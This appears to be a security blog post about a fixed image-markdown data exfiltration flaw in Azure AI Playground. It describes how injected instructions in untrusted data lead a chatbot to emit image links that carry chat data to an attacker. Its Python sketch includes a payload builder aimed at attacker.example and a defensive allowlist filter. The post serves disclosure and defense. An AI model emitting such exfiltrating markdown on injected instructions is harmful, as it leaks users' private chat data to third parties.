Microsoft Fixes Data Exfiltration Vulnerability in Azure AI Playground
Large Language Model (LLM) applications and chatbots are commonly vulnerable to data exfiltration. In particular, data exfiltration via Image Markdown Injection occurs frequently.
Microsoft fixed such a vulnerability in Bing Chat, Anthropic fixed it in Claude, but ChatGPT still has a known vulnerability, as OpenAI "won't fix" the issue.
This post describes a variant in the Azure AI Playground and how Microsoft fixed it.
From Untrusted Data to Data Exfiltration
When untrusted data makes it into the LLM prompt context, it can instruct the model to inject an image markdown element. If the client renders that markdown, the browser automatically requests the attacker-controlled image URL, and any chat data appended to that URL is sent to the attacker's server.
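As a minimal sketch of this attack class and a common server-side mitigation (all names, the attacker endpoint, and the allowlist below are illustrative, not taken from the Azure AI Playground fix): the first function shows the kind of image markdown an injected instruction asks the model to emit, and the second filters image markdown down to an allowlist of trusted hosts before rendering.

```python
import re
from urllib.parse import quote, urlparse

# Hypothetical attacker-controlled logging endpoint.
ATTACKER_URL = "https://attacker.example/log"

def build_exfil_markdown(secret: str) -> str:
    """Shape of the payload an injected prompt requests: an image whose
    URL carries URL-encoded chat data as a query parameter."""
    return f"![a]({ATTACKER_URL}?q={quote(secret)})"

# Illustrative allowlist of hosts images may be loaded from.
TRUSTED_HOSTS = {"learn.microsoft.com"}

# Matches markdown image syntax and captures the URL.
IMG_MD = re.compile(r"!\[[^\]]*\]\(([^)\s]+)[^)]*\)")

def strip_untrusted_images(markdown: str) -> str:
    """One common fix: drop image markdown whose host is not trusted,
    so the rendered chat never requests attacker URLs."""
    def repl(m: re.Match) -> str:
        host = urlparse(m.group(1)).hostname or ""
        return m.group(0) if host in TRUSTED_HOSTS else ""
    return IMG_MD.sub(repl, markdown)
```

With this filter in place, a payload like `build_exfil_markdown("session token")` is removed before rendering, while images from allowlisted hosts pass through unchanged.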